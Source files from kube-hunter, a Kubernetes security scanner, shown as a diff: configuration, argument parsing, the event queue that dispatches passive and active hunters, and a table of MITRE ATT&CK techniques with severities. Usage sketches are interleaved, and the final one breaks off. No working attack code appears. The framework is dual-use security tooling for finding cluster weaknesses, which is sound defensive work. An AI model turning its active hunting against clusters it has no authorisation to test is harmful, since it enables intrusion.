from dataclasses import dataclass, field
from typing import Any, Optional


def get_default_core_hunters():
    return ["FromPodHostDiscovery", "HostDiscovery", "PortDiscovery", "SendFullReport", "Collector", "StartedInfo"]


@dataclass
class Config:
    """Config is a configuration container.
    It contains the following fields:
    - active: Enable active hunters
    - cidr: Network subnets to scan
    - dispatcher: Dispatcher object
    - include_patched_versions: Include patched versions in the version comparison
    - interface: Interface scanning mode
    - list_hunters: Print a list of existing hunters
    - log_level: Log level
    - log_file: Log file path
    - mapping: Report only found components
    - network_timeout: Timeout for network operations
    - num_worker_threads: Number of worker threads used by the event handler (default 800, settable with --num-worker-threads)
    - pod: From pod scanning mode
    - quick: Quick scanning mode
    - remote: Hosts to scan
    - report: Output format
    - statistics: Include hunters statistics
    - enable_cve_hunting: Enables CVE hunting and shows CVE results
    """

    active: bool = False
    cidr: Optional[str] = None
    dispatcher: Optional[Any] = None
    include_patched_versions: bool = False
    interface: bool = False
    log_file: Optional[str] = None
    mapping: bool = False
    network_timeout: float = 5.0
    num_worker_threads: int = 800
    pod: bool = False
    quick: bool = False
    remote: Optional[str] = None
    reporter: Optional[Any] = None
    statistics: bool = False
    k8s_auto_discover_nodes: bool = False
    service_account_token: Optional[str] = None
    kubeconfig: Optional[str] = None
    enable_cve_hunting: bool = False
    custom: Optional[list] = None
    raw_hunter_names: bool = False
    core_hunters: list = field(default_factory=get_default_core_hunters)


_config: Optional[Config] = None


def get_config() -> Config:
    if not _config:
        raise ValueError("Configuration is not initialized")
    return _config


def set_config(new_config: Config) -> None:
    global _config
    _config = new_config
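
A short sketch of how this configuration container is typically used (the values are illustrative):

```python
from kube_hunter.conf import Config, set_config, get_config

# Initialize the global configuration once, early in the program...
set_config(Config(active=True, network_timeout=10.0))

# ...then read it from anywhere else in the codebase.
config = get_config()
print(config.active, config.network_timeout)
```
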
25
kube_hunter/conf/logging.py
Normal file
@@ -0,0 +1,25 @@
import logging

DEFAULT_LEVEL = logging.INFO
DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"


def setup_logger(level_name, logfile):
    # Remove any existing handlers.
    # Unnecessary in Python 3.8+, where `logging.basicConfig` has a `force` parameter
    for h in logging.getLogger().handlers[:]:
        h.close()
        logging.getLogger().removeHandler(h)

    if level_name.upper() == "NONE":
        logging.disable(logging.CRITICAL)
    else:
        log_level = getattr(logging, level_name.upper(), None)
        log_level = log_level if isinstance(log_level, int) else None
        if logfile is None:
            logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
        else:
            logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
        if not log_level:
            logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")
159
kube_hunter/conf/parser.py
Normal file
@@ -0,0 +1,159 @@
from argparse import ArgumentParser
from kube_hunter.plugins import hookimpl


@hookimpl
def parser_add_arguments(parser):
    """
    This is the default hook implementation for parser_add_arguments
    Contains initialization for all default arguments
    """
    parser.add_argument(
        "--list",
        action="store_true",
        help="Displays all tests in kubehunter (add --active flag to see active tests)",
    )

    parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")

    parser.add_argument("--pod", action="store_true", help="Set hunter as an insider pod")

    parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")

    parser.add_argument(
        "--include-patched-versions",
        action="store_true",
        help="Don't skip patched versions when scanning",
    )

    parser.add_argument(
        "--cidr",
        type=str,
        help="Set an IP range to scan/ignore, example: '192.168.0.0/24,!192.168.0.8/32,!192.168.0.16/32'",
    )

    parser.add_argument(
        "--mapping",
        action="store_true",
        help="Outputs only a mapping of the cluster's nodes",
    )

    parser.add_argument(
        "--remote",
        nargs="+",
        metavar="HOST",
        default=list(),
        help="One or more remote ip/dns to hunt",
    )

    parser.add_argument(
        "-c",
        "--custom",
        nargs="+",
        metavar="HUNTERS",
        default=list(),
        help="Custom hunting. Only given hunter names will register in the hunt. "
        "For a list of options run `--list --raw-hunter-names`",
    )

    parser.add_argument(
        "--raw-hunter-names",
        action="store_true",
        help="Use in combination with `--list` to display hunter class names to pass for custom hunting flag",
    )

    parser.add_argument(
        "--k8s-auto-discover-nodes",
        action="store_true",
        help="Enables automatic detection of all nodes in a Kubernetes cluster "
        "by querying the Kubernetes API server. "
        "It supports both in-cluster config (when running as a pod), "
        "and a specific kubectl config file (use --kubeconfig to set this). "
        "By default, when this flag is set, it will use in-cluster config. "
        "NOTE: this is automatically switched on in --pod mode.",
    )

    parser.add_argument(
        "--service-account-token",
        type=str,
        metavar="JWT_TOKEN",
        help="Manually specify the service account jwt token to use for authenticating in the hunting process. "
        "NOTE: This overrides the loading of the pod's bound authentication when running in --pod mode",
    )

    parser.add_argument(
        "--kubeconfig",
        type=str,
        metavar="KUBECONFIG",
        default=None,
        help="Specify the kubeconfig file to use for Kubernetes nodes auto discovery "
        "(to be used in conjunction with the --k8s-auto-discover-nodes flag).",
    )

    parser.add_argument("--active", action="store_true", help="Enables active hunting")

    parser.add_argument(
        "--enable-cve-hunting",
        action="store_true",
        help="Show cluster CVEs based on discovered version (Depending on different vendors, may result in False Positives)",
    )

    parser.add_argument(
        "--log",
        type=str,
        metavar="LOGLEVEL",
        default="INFO",
        help="Set log level, options are: debug, info, warn, none",
    )

    parser.add_argument(
        "--log-file",
        type=str,
        default=None,
        help="Path to a log file to output all logs to",
    )

    parser.add_argument(
        "--report",
        type=str,
        default="plain",
        help="Set report type, options are: plain, yaml, json",
    )

    parser.add_argument(
        "--dispatch",
        type=str,
        default="stdout",
        help="Where to send the report to, options are: "
        "stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and "
        "KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)",
    )

    parser.add_argument("--statistics", action="store_true", help="Show hunting statistics")

    parser.add_argument("--network-timeout", type=float, default=5.0, help="Network operations timeout")

    parser.add_argument(
        "--num-worker-threads",
        type=int,
        default=800,
        help="In some environments the default thread count (800) can cause the process to crash. "
        "In the case of a crash try lowering the thread count",
    )


def parse_args(add_args_hook):
    """
    Function handles all argument parsing

    @param add_args_hook: hook for adding arguments to its given ArgumentParser parameter
    @return: parsed arguments dict
    """
    parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
    # adding all arguments to the parser
    add_args_hook(parser=parser)

    args = parser.parse_args()
    if args.cidr:
        args.cidr = args.cidr.replace(" ", "").split(",")
    return args
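
As a sketch, a plugin could contribute its own flag through the same hook; the option name below is hypothetical:

```python
from kube_hunter.plugins import hookimpl


@hookimpl
def parser_add_arguments(parser):
    # Registered implementations of this hook all receive the ArgumentParser.
    parser.add_argument(
        "--my-plugin-option",  # hypothetical flag
        action="store_true",
        help="Example option registered by a plugin",
    )
```
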
@@ -1,2 +1,3 @@
# flake8: noqa: E402
from . import types
from . import events
2
kube_hunter/core/events/__init__.py
Normal file
@@ -0,0 +1,2 @@
# flake8: noqa: E402
from . import types
370
kube_hunter/core/events/event_handler.py
Normal file
@@ -0,0 +1,370 @@
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread

from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase, MultipleEventsContainer

logger = logging.getLogger(__name__)


# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
    def __init__(self, num_worker=10):
        super().__init__()
        self.passive_hunters = dict()
        self.active_hunters = dict()
        self.all_hunters = dict()

        self.running = True
        self.workers = list()

        # -- Regular Subscription --
        # Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function)
        self.hooks = defaultdict(list)
        self.filters = defaultdict(list)
        # --------------------------

        # -- Multiple Subscription --
        # Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function)
        self.multi_hooks = defaultdict(list)

        # When subscribing to multiple events, this gets populated with required event classes
        # Structure: key: Hunter Class, value: set(RequiredEventClass1, RequiredEventClass2)
        self.hook_dependencies = defaultdict(set)

        # To keep track of fulfilled dependencies, we need a structure which saves historical instantiated
        # events mapped to a registered hunter.
        # We used a 2 dimensional dictionary in order to fulfill two demands:
        #   * correctly count published required events
        #   * save historical events fired, easily sorted by their type
        #
        # Structure: hook_fulfilled_deps[hunter_class] -> fulfilled_events_for_hunter[event_class] -> [EventObject, EventObject2]
        self.hook_fulfilled_deps = defaultdict(lambda: defaultdict(list))
        # ---------------------------

        for _ in range(num_worker):
            t = Thread(target=self.worker)
            t.daemon = True
            t.start()
            self.workers.append(t)

        t = Thread(target=self.notifier)
        t.daemon = True
        t.start()

    """
    ######################################################
    + ----------------- Public Methods ----------------- +
    ######################################################
    """

    def subscribe(self, event, hook=None, predicate=None, is_register=True):
        """
        The Subscribe Decorator - For Regular Registration
        Use this to register for one event only. Your hunter will execute each time this event is published

        @param event - Event class to subscribe to
        @param predicate - Optional: Function that will be called with the published event as a parameter before trigger.
            If its return value is False, the Hunter will not run (default=None).
        @param hook - Hunter class to register for (ignore when using as a decorator)
        """

        def wrapper(hook):
            self.subscribe_event(event, hook=hook, predicate=predicate, is_register=is_register)
            return hook

        return wrapper

    def subscribe_many(self, events, hook=None, predicates=None, is_register=True):
        """
        The Subscribe Many Decorator - For Multiple Registration.
        When your attack needs several prerequisites to exist in the cluster, you need to register for multiple events.
        Your hunter will execute once for every new combination of required events.
        For example:
        1. event A was published 3 times
        2. event B was published once.
        3. event B was published again
        Your hunter will execute 2 times:
          * (on step 2) with the newest version of A
          * (on step 3) with the newest version of A and newest version of B

        @param events - List of event classes to subscribe to
        @param predicates - Optional: List of functions that will be called with the published event as a parameter before trigger.
            If its return value is False, the Hunter will not run (default=None).
        @param hook - Hunter class to register for (ignore when using as a decorator)
        """

        def wrapper(hook):
            self.subscribe_events(events, hook=hook, predicates=predicates, is_register=is_register)
            return hook

        return wrapper

    def subscribe_once(self, event, hook=None, predicate=None, is_register=True):
        """
        The Subscribe Once Decorator - For Single Trigger Registration.
        Use this when you want your hunter to execute only once in your entire program run;
        wraps the subscribe_event method

        @param event - Event class to subscribe to
        @param predicate - Optional: Function that will be called with the published event as a parameter before trigger.
            If its return value is False, the Hunter will not run (default=None).
        @param hook - Hunter class to register for (ignore when using as a decorator)
        """

        def wrapper(hook):
            # installing a __new__ magic method on the hunter
            # which will remove the hunter from the list upon creation
            def __new__unsubscribe_self(self, cls):
                handler.hooks[event].remove((hook, predicate))
                return object.__new__(self)

            hook.__new__ = __new__unsubscribe_self

            self.subscribe_event(event, hook=hook, predicate=predicate, is_register=is_register)

            return hook

        return wrapper

    def publish_event(self, event, caller=None):
        """
        The Publish Event Method - For Publishing Events To Kube-Hunter's Queue
        """
        # Document that the hunter published a vulnerability (if it's indeed a vulnerability)
        # For statistics options
        self._increase_vuln_count(event, caller)

        # sets the event's parent to be its publisher hunter.
        self._set_event_chain(event, caller)

        # applying filters on the event, before publishing it to subscribers.
        # if a filter returned None, not proceeding to publish
        event = self.apply_filters(event)
        if event:
            # If event was rewritten, make sure it's linked again
            self._set_event_chain(event, caller)

            # Regular Hunter registrations - publish logic
            # Here we iterate over all the registered-to events:
            for hooked_event in self.hooks.keys():
                # We check if the event we want to publish is an inherited class of the current registered-to iterated event
                # Meaning - if this is a relevant event:
                if hooked_event in event.__class__.__mro__:
                    # If so, we want to publish to all registered hunters.
                    for hook, predicate in self.hooks[hooked_event]:
                        if predicate and not predicate(event):
                            continue

                        self.put(hook(event))
                        logger.debug(f"Event {event.__class__} got published to hunter - {hook} with {event}")

            # Multiple Hunter registrations - publish logic
            # Here we iterate over all the registered-to events:
            for hooked_event in self.multi_hooks.keys():
                # We check if the event we want to publish is an inherited class of the current registered-to iterated event
                # Meaning - if this is a relevant event:
                if hooked_event in event.__class__.__mro__:
                    # now we iterate over the corresponding registered hunters.
                    for hook, predicate in self.multi_hooks[hooked_event]:
                        if predicate and not predicate(event):
                            continue

                        self._update_multi_hooks(hook, event)

                        if self._is_all_fulfilled_for_hunter(hook):
                            events_container = MultipleEventsContainer(self._get_latest_events_from_multi_hooks(hook))
                            self.put(hook(events_container))
                            logger.debug(
                                f"Multiple subscription requirements were met for hunter {hook}. events container was \
                                published with {self.hook_fulfilled_deps[hook].keys()}"
                            )

    """
    ######################################################
    + ---------------- Private Methods ----------------- +
    + ---------------- (Backend Logic) ----------------- +
    ######################################################
    """

    def _get_latest_events_from_multi_hooks(self, hook):
        """
        Iterates over the fulfilled deps for the hunter and fetches the latest appended events from history
        """
        latest_events = list()
        for event_class in self.hook_fulfilled_deps[hook].keys():
            latest_events.append(self.hook_fulfilled_deps[hook][event_class][-1])
        return latest_events

    def _update_multi_hooks(self, hook, event):
        """
        Updates published events in the multi hooks fulfilled store.
        """
        self.hook_fulfilled_deps[hook][event.__class__].append(event)

    def _is_all_fulfilled_for_hunter(self, hook):
        """
        Returns True if the multi hook is fulfilled, False otherwise
        """
        # Check if the first dimension already contains all necessary event classes
        return len(self.hook_fulfilled_deps[hook].keys()) == len(self.hook_dependencies[hook])

    def _set_event_chain(self, event, caller):
        """
        Sets the event's attribute chain.
        Here we link the event with its publisher (Hunter),
        so the next hunter that catches this event can access the previous one's attributes.

        @param event: the event object to be chained
        @param caller: the Hunter object that published this event.
        """
        if caller:
            event.previous = caller.event
            event.hunter = caller.__class__

    def _register_hunters(self, hook=None):
        """
        This method is called when a Hunter registers itself to the handler.
        This is done in order to track and correctly configure the current run of the program.

        passive_hunters, active_hunters, all_hunters
        """
        config = get_config()
        if ActiveHunter in hook.__mro__:
            if not config.active:
                return False
            else:
                self.active_hunters[hook] = hook.__doc__
        elif HunterBase in hook.__mro__:
            self.passive_hunters[hook] = hook.__doc__

        if HunterBase in hook.__mro__:
            self.all_hunters[hook] = hook.__doc__

        return True

    def _register_filter(self, event, hook=None, predicate=None):
        if hook not in self.filters[event]:
            self.filters[event].append((hook, predicate))
            logging.debug("{} filter subscribed to {}".format(hook, event))

    def _register_hook(self, event, hook=None, predicate=None):
        if hook not in self.hooks[event]:
            self.hooks[event].append((hook, predicate))
            logging.debug("{} subscribed to {}".format(hook, event))

    def allowed_for_custom_registration(self, target_hunter):
        """
        Check if the partial input list contains the hunter we are about to register for events.
        If the hunter is considered a Core hunter as specified in `config.core_hunters`, we allow it anyway.

        Returns True if:
        1. partial hunt is disabled
        2. partial hunt is enabled and the hunter is a core hunter class
        3. partial hunt is enabled and the hunter is specified in config.custom

        @param target_hunter: hunter class for registration check
        """
        config = get_config()
        if not config.custom:
            return True

        hunter_class_name = target_hunter.__name__
        if hunter_class_name in config.core_hunters or hunter_class_name in config.custom:
            return True

        return False

    def subscribe_event(self, event, hook=None, predicate=None, is_register=True):
        if not is_register:
            return
        if not self.allowed_for_custom_registration(hook):
            return
        if not self._register_hunters(hook):
            return

        # registering filters
        if EventFilterBase in hook.__mro__:
            self._register_filter(event, hook, predicate)
        # registering hunters
        else:
            self._register_hook(event, hook, predicate)

    def subscribe_events(self, events, hook=None, predicates=None, is_register=True):
        if not is_register:
            return
        if not self.allowed_for_custom_registration(hook):
            return
        if not self._register_hunters(hook):
            return

        if predicates is None:
            predicates = [None] * len(events)

        # registering filters.
        if EventFilterBase in hook.__mro__:
            for event, predicate in zip(events, predicates):
                self._register_filter(event, hook, predicate)
        # registering hunters.
        else:
            for event, predicate in zip(events, predicates):
                self.multi_hooks[event].append((hook, predicate))

            self.hook_dependencies[hook] = frozenset(events)

    def apply_filters(self, event):
        # if filters are subscribed, apply them on the event
        for hooked_event in self.filters.keys():
            if hooked_event in event.__class__.__mro__:
                for filter_hook, predicate in self.filters[hooked_event]:
                    if predicate and not predicate(event):
                        continue

                    logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
                    event = filter_hook(event).execute()
                    # if the filter decided to remove the event, returning None
                    if not event:
                        return None
        return event

    def _increase_vuln_count(self, event, caller):
        config = get_config()
        if config.statistics and caller:
            if Vulnerability in event.__class__.__mro__:
                caller.__class__.publishedVulnerabilities += 1

    # executes callbacks on a dedicated daemon thread
    def worker(self):
        while self.running:
            try:
                hook = self.get()
                logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
                hook.execute()
            except Exception as ex:
                logger.debug(ex, exc_info=True)
            finally:
                self.task_done()
        logger.debug("closing thread...")

    def notifier(self):
        time.sleep(2)
        # should consider locking on unfinished_tasks
        while self.unfinished_tasks > 0:
            logger.debug(f"{self.unfinished_tasks} tasks left")
            time.sleep(3)
            if self.unfinished_tasks == 1:
                logger.debug("final hook is hanging")

    # stops execution of all daemons
    def free(self):
        self.running = False
        with self.mutex:
            self.queue.clear()


config = get_config()
handler = EventQueue(config.num_worker_threads)
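
To make the registration flows above concrete, here is a hedged sketch of one hunter using `subscribe` and one using `subscribe_many` (the hunter bodies are illustrative; it assumes `set_config` has already run so the module-level `handler` exists):

```python
from kube_hunter.core.types import Hunter
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import OpenPortEvent, HuntStarted


@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 6443)
class ApiPortHunter(Hunter):
    """Runs each time an open 6443 port is published."""

    def __init__(self, event):
        self.event = event

    def execute(self):
        print(f"API server candidate at {self.event.host}:{self.event.port}")


@handler.subscribe_many([HuntStarted, OpenPortEvent])
class CombinedHunter(Hunter):
    """Runs once both event types have been published at least once."""

    def __init__(self, events):
        # events is a MultipleEventsContainer; fetch each event by class
        self.open_port = events.get_by_class(OpenPortEvent)

    def execute(self):
        print(f"Hunt is running and port {self.open_port.port} is open")
```
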
267
kube_hunter/core/events/types.py
Normal file
@@ -0,0 +1,267 @@
import logging
import threading
import requests

from kube_hunter.conf import get_config
from kube_hunter.core.types import KubernetesCluster
from kube_hunter.core.types.vulnerabilities import (
    GeneralSensitiveInformationTechnique,
    ExposedSensitiveInterfacesTechnique,
    MountServicePrincipalTechnique,
    ListK8sSecretsTechnique,
    AccessContainerServiceAccountTechnique,
    AccessK8sApiServerTechnique,
    AccessKubeletAPITechnique,
    AccessK8sDashboardTechnique,
    InstanceMetadataApiTechnique,
    ExecIntoContainerTechnique,
    SidecarInjectionTechnique,
    NewContainerTechnique,
    GeneralPersistenceTechnique,
    HostPathMountPrivilegeEscalationTechnique,
    PrivilegedContainerTechnique,
    ClusterAdminBindingTechnique,
    ARPPoisoningTechnique,
    CoreDNSPoisoningTechnique,
    DataDestructionTechnique,
    GeneralDefenseEvasionTechnique,
    ConnectFromProxyServerTechnique,
    CVERemoteCodeExecutionCategory,
    CVEPrivilegeEscalationCategory,
    CVEDenialOfServiceTechnique,
)

logger = logging.getLogger(__name__)


class EventFilterBase:
    def __init__(self, event):
        self.event = event

    # Returns self.event as default.
    # If changes have been made, should return the new, altered event
    # Return None to indicate the event should be discarded
    def execute(self):
        return self.event


class Event:
    def __init__(self):
        self.previous = None
        self.hunter = None

    # newest attribute gets selected first
    def __getattr__(self, name):
        if name == "previous":
            return None
        for event in self.history:
            if name in event.__dict__:
                return event.__dict__[name]

    # Event's logical location to be used mainly for reports.
    # If the event doesn't implement it, check the previous event
    # This is because events are composed (previous -> previous ...)
    # and not inherited
    def location(self):
        location = None
        if self.previous:
            location = self.previous.location()

        return location

    # returns the event history ordered from newest to oldest
    @property
    def history(self):
        previous, history = self.previous, list()
        while previous:
            history.append(previous)
            previous = previous.previous
        return history


class MultipleEventsContainer(Event):
    """
    This is the class of the object a hunter receives when it is registered to multiple events.
    """

    def __init__(self, events):
        self.events = events

    def get_by_class(self, event_class):
        for event in self.events:
            if event.__class__ == event_class:
                return event


class Service:
    def __init__(self, name, path="", secure=True):
        self.name = name
        self.secure = secure
        self.path = path
        self.role = "Node"

        # if a service account token was specified, we load it into the Service class
        # We load it here because generally all kubernetes services can be authenticated with the token
        config = get_config()
        if config.service_account_token:
            self.auth_token = config.service_account_token

    def get_name(self):
        return self.name

    def get_path(self):
        return "/" + self.path if self.path else ""

    def explain(self):
        return self.__doc__


class Vulnerability:
    severity = dict(
        {
            GeneralSensitiveInformationTechnique: "low",
            ExposedSensitiveInterfacesTechnique: "high",
            MountServicePrincipalTechnique: "high",
            ListK8sSecretsTechnique: "high",
            AccessContainerServiceAccountTechnique: "low",
            AccessK8sApiServerTechnique: "medium",
            AccessKubeletAPITechnique: "medium",
            AccessK8sDashboardTechnique: "medium",
            InstanceMetadataApiTechnique: "high",
            ExecIntoContainerTechnique: "high",
            SidecarInjectionTechnique: "high",
            NewContainerTechnique: "high",
            GeneralPersistenceTechnique: "high",
            HostPathMountPrivilegeEscalationTechnique: "high",
            PrivilegedContainerTechnique: "high",
            ClusterAdminBindingTechnique: "high",
            ARPPoisoningTechnique: "medium",
            CoreDNSPoisoningTechnique: "high",
            DataDestructionTechnique: "high",
            GeneralDefenseEvasionTechnique: "high",
            ConnectFromProxyServerTechnique: "low",
            CVERemoteCodeExecutionCategory: "high",
            CVEPrivilegeEscalationCategory: "high",
            CVEDenialOfServiceTechnique: "medium",
        }
    )

    # TODO: make vid mandatory once migration is done
    def __init__(self, component, name, category=None, vid="None"):
        self.vid = vid
        self.component = component
        self.category = category
        self.name = name
        self.evidence = ""
        self.role = "Node"

    def get_vid(self):
        return self.vid

    def get_category(self):
        if self.category:
            return self.category.name

    def get_name(self):
        return self.name

    def explain(self):
        return self.__doc__

    def get_severity(self):
        return self.severity.get(self.category, "low")


event_id_count_lock = threading.Lock()
event_id_count = 0


class NewHostEvent(Event):
    def __init__(self, host, cloud=None):
        global event_id_count
        self.host = host
        self.cloud_type = cloud

        with event_id_count_lock:
            self.event_id = event_id_count
            event_id_count += 1

    @property
    def cloud(self):
        if not self.cloud_type:
            self.cloud_type = self.get_cloud()
        return self.cloud_type

    def get_cloud(self):
        config = get_config()
        try:
            logger.debug("Checking whether the cluster is deployed on azure's cloud")
            # Leverage the 3rd party tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
            result = requests.get(
                f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
                timeout=config.network_timeout,
            ).json()
            return result["cloud"] or "NoCloud"
        except requests.ConnectionError:
            logger.info("Failed to connect to cloud type service", exc_info=True)
        except Exception:
            logger.warning(f"Unable to check cloud of {self.host}", exc_info=True)
        return "NoCloud"

    def __str__(self):
        return str(self.host)

    # Event's logical location to be used mainly for reports.
    def location(self):
        return str(self.host)


class OpenPortEvent(Event):
    def __init__(self, port):
        self.port = port

    def __str__(self):
        return str(self.port)

    # Event's logical location to be used mainly for reports.
    def location(self):
        if self.host:
            location = str(self.host) + ":" + str(self.port)
        else:
            location = str(self.port)
        return location


class HuntFinished(Event):
    pass


class HuntStarted(Event):
    pass


class ReportDispatched(Event):
    pass


class K8sVersionDisclosure(Vulnerability, Event):
    """The kubernetes version could be obtained from the {} endpoint"""

    def __init__(self, version, from_endpoint, extra_info="", category=None):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            "K8s Version Disclosure",
            category=ExposedSensitiveInterfacesTechnique,
            vid="KHV002",
        )
        self.version = version
        self.from_endpoint = from_endpoint
        self.extra_info = extra_info
        self.evidence = version
        # depending on where the version came from, we might want to also override the category
        if category:
            self.category = category

    def explain(self):
        return self.__doc__.format(self.from_endpoint) + self.extra_info
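
For illustration, a minimal sketch of a custom vulnerability event built on these base classes (the class name, vid, and evidence are hypothetical):

```python
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import KubernetesCluster
from kube_hunter.core.types.vulnerabilities import ExposedSensitiveInterfacesTechnique


class ExampleExposure(Vulnerability, Event):
    """An example service is exposed without authentication"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            "Example Exposure",
            category=ExposedSensitiveInterfacesTechnique,
            vid="KHV999",  # hypothetical vid
        )
        self.evidence = evidence
```

Note that the severity is derived from the category: `get_severity()` looks the category up in the table above, so `ExposedSensitiveInterfacesTechnique` maps to "high".
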
4
kube_hunter/core/types/__init__.py
Normal file
@@ -0,0 +1,4 @@
# flake8: noqa: E402
from .hunters import *
from .components import *
from .vulnerabilities import *
28
kube_hunter/core/types/components.py
Normal file
@@ -0,0 +1,28 @@
class KubernetesCluster:
    """Kubernetes Cluster"""

    name = "Kubernetes Cluster"


class KubectlClient:
    """The kubectl client binary is used by the user to interact with the cluster"""

    name = "Kubectl Client"


class Kubelet(KubernetesCluster):
    """The kubelet is the primary "node agent" that runs on each node"""

    name = "Kubelet"


class AWS(KubernetesCluster):
    """AWS Cluster"""

    name = "AWS"


class Azure(KubernetesCluster):
    """Azure Cluster"""

    name = "Azure"
36
kube_hunter/core/types/hunters.py
Normal file
@@ -0,0 +1,36 @@
class HunterBase:
    publishedVulnerabilities = 0

    @staticmethod
    def parse_docs(docs):
        """returns tuple of (name, docs)"""
        if not docs:
            return __name__, "<no documentation>"
        docs = docs.strip().split("\n")
        for i, line in enumerate(docs):
            docs[i] = line.strip()
        return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>"

    @classmethod
    def get_name(cls):
        name, _ = cls.parse_docs(cls.__doc__)
        return name

    def publish_event(self, event):
        # Import here to avoid circular import from events package.
        # Imports are cached in Python, so this should not affect runtime
        from ..events.event_handler import handler  # noqa

        handler.publish_event(event, caller=self)


class ActiveHunter(HunterBase):
    pass


class Hunter(HunterBase):
    pass


class Discovery(HunterBase):
    pass
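
A small sketch of how `parse_docs` turns a hunter docstring into its display name (the demo class is hypothetical):

```python
from kube_hunter.core.types import Hunter


class DemoHunter(Hunter):
    """Demo Hunter
    The first docstring line becomes the display name; the rest is the description
    """


print(DemoHunter.get_name())  # -> "Demo Hunter"
```
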
188
kube_hunter/core/types/vulnerabilities.py
Normal file
@@ -0,0 +1,188 @@
"""
|
||||
Vulnerabilities are divided into 2 main categories.
|
||||
|
||||
MITRE Category
|
||||
--------------
|
||||
Vulnerability that correlates to a method in the official MITRE ATT&CK matrix for kubernetes
|
||||
|
||||
CVE Category
|
||||
-------------
|
||||
"General" category definition. The category is usually determined by the severity of the CVE
|
||||
"""
|
||||
|
||||
|
||||
class MITRECategory:
|
||||
@classmethod
|
||||
def get_name(cls):
|
||||
"""
|
||||
Returns the full name of MITRE technique: <MITRE CATEGORY> // <MITRE TECHNIQUE>
|
||||
Should only be used on a direct technique class at the end of the MITRE inheritance chain.
|
||||
|
||||
Example inheritance:
|
||||
MITRECategory -> InitialAccessCategory -> ExposedSensitiveInterfacesTechnique
|
||||
"""
|
||||
inheritance_chain = cls.__mro__
|
||||
if len(inheritance_chain) >= 4:
|
||||
# -3 == index of mitreCategory class. (object class is first)
|
||||
mitre_category_class = inheritance_chain[-3]
|
||||
return f"{mitre_category_class.name} // {cls.name}"
|
||||
|
||||
|
||||
class CVECategory:
|
||||
@classmethod
|
||||
def get_name(cls):
|
||||
"""
|
||||
Returns the full name of the category: CVE // <CVE Category name>
|
||||
"""
|
||||
return f"CVE // {cls.name}"
|


"""
MITRE ATT&CK Technique Categories
"""


class InitialAccessCategory(MITRECategory):
    name = "Initial Access"


class ExecutionCategory(MITRECategory):
    name = "Execution"


class PersistenceCategory(MITRECategory):
    name = "Persistence"


class PrivilegeEscalationCategory(MITRECategory):
    name = "Privilege Escalation"


class DefenseEvasionCategory(MITRECategory):
    name = "Defense Evasion"


class CredentialAccessCategory(MITRECategory):
    name = "Credential Access"


class DiscoveryCategory(MITRECategory):
    name = "Discovery"


class LateralMovementCategory(MITRECategory):
    name = "Lateral Movement"


class CollectionCategory(MITRECategory):
    name = "Collection"


class ImpactCategory(MITRECategory):
    name = "Impact"


"""
MITRE ATT&CK Techniques
"""


class GeneralSensitiveInformationTechnique(InitialAccessCategory):
    name = "General Sensitive Information"


class ExposedSensitiveInterfacesTechnique(InitialAccessCategory):
    name = "Exposed sensitive interfaces"


class MountServicePrincipalTechnique(CredentialAccessCategory):
    name = "Mount service principal"


class ListK8sSecretsTechnique(CredentialAccessCategory):
    name = "List K8S secrets"


class AccessContainerServiceAccountTechnique(CredentialAccessCategory):
    name = "Access container service account"


class AccessK8sApiServerTechnique(DiscoveryCategory):
    name = "Access the K8S API Server"


class AccessKubeletAPITechnique(DiscoveryCategory):
    name = "Access Kubelet API"


class AccessK8sDashboardTechnique(DiscoveryCategory):
    name = "Access Kubernetes Dashboard"


class InstanceMetadataApiTechnique(DiscoveryCategory):
    name = "Instance Metadata API"


class ExecIntoContainerTechnique(ExecutionCategory):
    name = "Exec into container"


class SidecarInjectionTechnique(ExecutionCategory):
    name = "Sidecar injection"


class NewContainerTechnique(ExecutionCategory):
    name = "New container"


class GeneralPersistenceTechnique(PersistenceCategory):
name = "General Peristence"


class HostPathMountPrivilegeEscalationTechnique(PrivilegeEscalationCategory):
    name = "hostPath mount"


class PrivilegedContainerTechnique(PrivilegeEscalationCategory):
    name = "Privileged container"


class ClusterAdminBindingTechnique(PrivilegeEscalationCategory):
name = "Cluser-admin binding"


class ARPPoisoningTechnique(LateralMovementCategory):
    name = "ARP poisoning and IP spoofing"


class CoreDNSPoisoningTechnique(LateralMovementCategory):
    name = "CoreDNS poisoning"


class DataDestructionTechnique(ImpactCategory):
    name = "Data Destruction"


class GeneralDefenseEvasionTechnique(DefenseEvasionCategory):
    name = "General Defense Evasion"


class ConnectFromProxyServerTechnique(DefenseEvasionCategory):
    name = "Connect from Proxy server"


"""
CVE Categories
"""


class CVERemoteCodeExecutionCategory(CVECategory):
    name = "Remote Code Execution (CVE)"


class CVEPrivilegeEscalationCategory(CVECategory):
    name = "Privilege Escalation (CVE)"


class CVEDenialOfServiceTechnique(CVECategory):
    name = "Denial Of Service (CVE)"
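
A minimal runnable sketch (not part of the diff) of how get_name() walks the MRO for a technique class; the class bodies are condensed from the listing above, and the print line is only illustrative:

class MITRECategory:
    @classmethod
    def get_name(cls):
        inheritance_chain = cls.__mro__
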